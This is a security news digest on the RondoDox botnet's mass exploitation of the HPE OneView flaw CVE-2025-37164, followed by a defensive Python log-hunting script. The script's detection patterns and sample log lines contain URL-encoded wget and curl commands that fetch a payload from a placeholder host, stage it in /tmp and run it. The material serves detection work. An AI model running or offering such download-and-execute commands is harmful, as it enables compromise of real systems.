RondoDox botnet linked to large-scale exploit of critical HPE OneView bug
Summary
Check Point has observed mass exploitation of CVE-2025-37164, a maximum-severity remote code execution flaw in HPE OneView. Between 05:45 and 09:20 UTC on 7 January 2026, telemetry recorded more than 40,000 automated attack attempts targeting the bug. The activity is attributed to the RondoDox Linux-based botnet, which uses a wide-ranging ‘exploit-shotgun’ method to compromise devices and deliver secondary payloads.
The vulnerability affects OneView, HPE’s central data-centre management platform that controls servers, storage and networking — making it a high-value target. Check Point linked the attacks to RondoDox via a distinctive user-agent and observed commands used to fetch RondoDox malware. The attacks were global and focused largely on government organisations, financial services and industrial manufacturers.
Key Points
- Over 40,000 automated exploitation attempts against CVE-2025-37164 were observed in a window of under four hours (05:45 to 09:20 UTC) on 7 January 2026.
- CVE-2025-37164 is a maximum-severity remote code execution flaw in HPE OneView, a centralised management platform.
- Check Point attributes the campaign to the RondoDox botnet based on user-agent strings and commands used to download malware.
- Attacks were global, with the highest volumes seen in the United States, then Australia, France, Germany and Austria.
- Primary targets included government organisations, financial services and industrial manufacturers.
- The incident underscores the danger of slow patch cycles for management platforms — HPE urged users to apply the patch promptly.
Context and relevance
Management platforms like OneView sit at the heart of data-centre operations; a successful RCE there can give an attacker broad, high-privilege control over the servers, storage and networking the platform manages. The RondoDox activity fits a wider trend of automated, opportunistic mass exploitation in which adversaries weaponise a flaw soon after its fix becomes public and scan for instances that have not yet been patched. For IT, security and ops teams this is a reminder to prioritise patching, to monitor requests to the management interface for indicators such as unusual user-agents and suspicious download commands, and to restrict access to management interfaces.
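A hunt over request logs for the two indicators named above (unexpected user-agents and download-and-execute commands), plus a burst check for the kind of automated volume Check Point reported. This is an added example, not code from Check Point, HPE or The Register. It assumes a reverse proxy in front of the management interface writes one JSON object per request with the fields used here; the field names, the baseline of expected user-agents, the endpoint path, the IP addresses and every log line are constructed placeholders, not the campaign's real user-agent or payload, and the patterns flag generic fetch-and-run shell commands rather than any RondoDox-specific signature.

```python
"""Hunt for opportunistic exploitation traffic against a management interface.

Added example, not Check Point's, HPE's or The Register's code. It assumes a
reverse proxy in front of the appliance writes one JSON object per request
with the fields used below. Field names, the user-agent baseline, the endpoint
path, the IP addresses and every log line are constructed placeholders.
"""
import json
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import unquote, unquote_plus

# Hypothetical baseline: user-agents the management team expects on this interface.
# On a management-only network anything outside the baseline deserves a look.
KNOWN_USER_AGENTS = (
    re.compile(r"^Mozilla/5\.0 .*(Chrome|Firefox|Safari)/"),
    re.compile(r"^internal-automation/"),   # assumed in-house tooling, placeholder name
)

# Shapes a generic "fetch stage two and run it" payload takes once URL-decoded.
# Deliberately not a signature for any particular botnet.
DOWNLOAD_EXEC = re.compile(
    r"(?:wget|curl|tftp|busybox)\s+[^;|&]*"   # a fetcher with its arguments
    r"|chmod\s+\+?[0-7x]+\s+\S+"              # marking the drop executable
    r"|\|\s*(?:sh|bash)\b"                    # piping straight into a shell
    r"|/tmp/[\w.\-]+",                        # staging under /tmp
    re.IGNORECASE,
)

BURST_THRESHOLD = 5  # requests from one source within one minute; tune per estate


def decode(s):
    """URL-decode twice: kits often double-encode to slip past naive filters.
    The second pass is percent-only so a literal '+' from the first pass survives."""
    return unquote(unquote_plus(s or ""))


def analyse(ndjson_lines):
    """Return [(source_ip, [reasons])] for sources that look like mass exploitation."""
    findings = defaultdict(set)
    per_minute = Counter()
    for raw in ndjson_lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        src = ev["src"]
        ua = ev.get("ua", "")
        if not any(p.search(ua) for p in KNOWN_USER_AGENTS):
            findings[src].add("unexpected user-agent: %r" % ua)
        # Check path and body together: payloads arrive in either.
        blob = decode(ev.get("path", "")) + " " + decode(ev.get("body", ""))
        m = DOWNLOAD_EXEC.search(blob)
        if m:
            findings[src].add("download-and-execute pattern: %r" % m.group(0))
        minute = datetime.fromisoformat(ev["ts"]).strftime("%Y-%m-%dT%H:%M")
        per_minute[(src, minute)] += 1
    for (src, minute), n in per_minute.items():
        if n >= BURST_THRESHOLD:
            findings[src].add("burst: %d requests in minute %s" % (n, minute))
    return sorted((src, sorted(reasons)) for src, reasons in findings.items())


# Constructed log lines (RFC 5737 documentation addresses, placeholder endpoint).
SAMPLE_LOG = """\
{"ts":"2026-01-07T06:10:02","src":"10.0.0.5","method":"GET","path":"/","status":200,"ua":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36","body":""}
{"ts":"2026-01-07T06:10:15","src":"203.0.113.9","method":"POST","path":"/rest/placeholder","status":500,"ua":"python-requests/2.31","body":"cmd=wget%20http%3A%2F%2F198.51.100.7%2Fx.sh%20-O%20%2Ftmp%2Fx%3Bchmod%20%2Bx%20%2Ftmp%2Fx%3B%2Ftmp%2Fx"}
{"ts":"2026-01-07T06:10:16","src":"203.0.113.9","method":"POST","path":"/rest/placeholder","status":500,"ua":"python-requests/2.31","body":"cmd=wget%20http%3A%2F%2F198.51.100.7%2Fx.sh%20-O%20%2Ftmp%2Fx%3Bchmod%20%2Bx%20%2Ftmp%2Fx%3B%2Ftmp%2Fx"}
{"ts":"2026-01-07T06:10:17","src":"203.0.113.9","method":"POST","path":"/rest/placeholder","status":500,"ua":"python-requests/2.31","body":"cmd=wget%20http%3A%2F%2F198.51.100.7%2Fx.sh%20-O%20%2Ftmp%2Fx%3Bchmod%20%2Bx%20%2Ftmp%2Fx%3B%2Ftmp%2Fx"}
{"ts":"2026-01-07T06:10:18","src":"203.0.113.9","method":"POST","path":"/rest/placeholder","status":500,"ua":"python-requests/2.31","body":"cmd=wget%20http%3A%2F%2F198.51.100.7%2Fx.sh%20-O%20%2Ftmp%2Fx%3Bchmod%20%2Bx%20%2Ftmp%2Fx%3B%2Ftmp%2Fx"}
{"ts":"2026-01-07T06:10:19","src":"203.0.113.9","method":"POST","path":"/rest/placeholder","status":500,"ua":"python-requests/2.31","body":"cmd=wget%20http%3A%2F%2F198.51.100.7%2Fx.sh%20-O%20%2Ftmp%2Fx%3Bchmod%20%2Bx%20%2Ftmp%2Fx%3B%2Ftmp%2Fx"}
{"ts":"2026-01-07T06:12:40","src":"192.0.2.44","method":"GET","path":"/rest/placeholder?x=curl%20http%3A%2F%2F198.51.100.7%2Fa%7Csh","status":404,"ua":"","body":""}
{"ts":"2026-01-07T06:13:00","src":"10.0.0.7","method":"GET","path":"/","status":200,"ua":"internal-automation/1.0","body":""}
"""

if __name__ == "__main__":
    for src, reasons in analyse(SAMPLE_LOG.splitlines()):
        print(src)
        for r in reasons:
            print("  -", r)
```

Run it directly to print the flagged sources and the reason for each; to use it on real data, feed your proxy's NDJSON lines to `analyse()` and replace the user-agent baseline with the clients your team actually uses. The three checks are independent on purpose: a single request carrying a fetch-and-run command is worth a look even without a burst, and a burst of otherwise clean-looking requests from one address against a management interface is still worth a look. On an estate where the management network is properly segmented, any request from outside that network is itself a finding before these rules run.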
Author’s take
Punchy: This isn’t theoretical — it’s active, automated and noisy. If you manage HPE OneView or run systems that depend on it, treat this as high priority: patch, isolate management networks and hunt for compromise indicators now.
Why should I read this?
Quick and blunt: if you care about keeping your servers and network under your control, this matters. The article shows attackers are already exploiting the OneView bug at scale — we’ve saved you time by flagging what to patch and where to look for signs of compromise.
Source
Source: https://go.theregister.com/feed/www.theregister.com/2026/01/16/rondodox_botnet_hpe_oneview/
